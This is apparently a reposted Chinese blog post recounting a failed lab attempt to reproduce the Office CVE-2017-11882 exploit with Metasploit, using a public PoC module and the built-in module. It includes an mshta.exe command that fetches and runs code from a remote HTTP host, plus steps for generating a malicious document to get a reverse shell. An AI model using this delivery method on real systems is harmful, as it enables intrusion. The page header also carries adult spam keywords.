日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 >

Office CVE-2017-11882复现

發布時間:2025/3/17 24 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Office CVE-2017-11882复现 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

繼續練習metasploit的使用,這次復現的是11882這個漏洞,但是最后并沒有成功(已經把我逼瘋)。這里記錄兩個復現方式,希望有緣人能夠為小女子解答最后不成功的原因,小女子感激不盡。


就不去介紹這個漏洞了,網上搜一大把的。下面直接放兩個方式的截圖以及簡單講解。
00X0利用網上的poc來復現
poc地址:https://www.cnblogs.com/i-honey/p/7885573.html
首先要把cve-2017-11882.rb文件復制到msf模塊下

然后打開README.md,按照提示進行惡意doc的生成,其中有一個是用來彈計算器的。我們直接生成惡意doc,注意這里的地址要換成你自己主機的地址。

然后我們來使用我們添加的msf模塊,設置參數,這里如果search不到新添加的模塊可以使用:reload_all命令


然后運行,這里也顯示失敗的結果了。如果成功反彈shell輸入sessions的時候會出現一個或者多個session。

失敗的原因我想和下面這個錯誤有關。當我在本地cmd下運行【mshta.exe "http://192.168.40.22:8080/abc " 的時候也是出現系統找不到指定文件的錯誤。

00X01利用Metasploit自帶exp
search模塊,然后set參數,如圖,當我在主機打開惡意doc時,直接出來下圖內容,之前在網上看到一哥們說這是表示本機office沒有漏洞,但是我利用彈計算器的測試doc能夠成功彈出doc,說明本地office版本應該還是有漏洞的吧。

朋友說是我主機windows系統的原因,他在他本地也不能反彈,但是他在他windows虛擬機里面就可以。我也是母雞了~

轉載于:https://blog.51cto.com/13539934/2103188

總結

以上是生活随笔為你收集整理的Office CVE-2017-11882复现的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。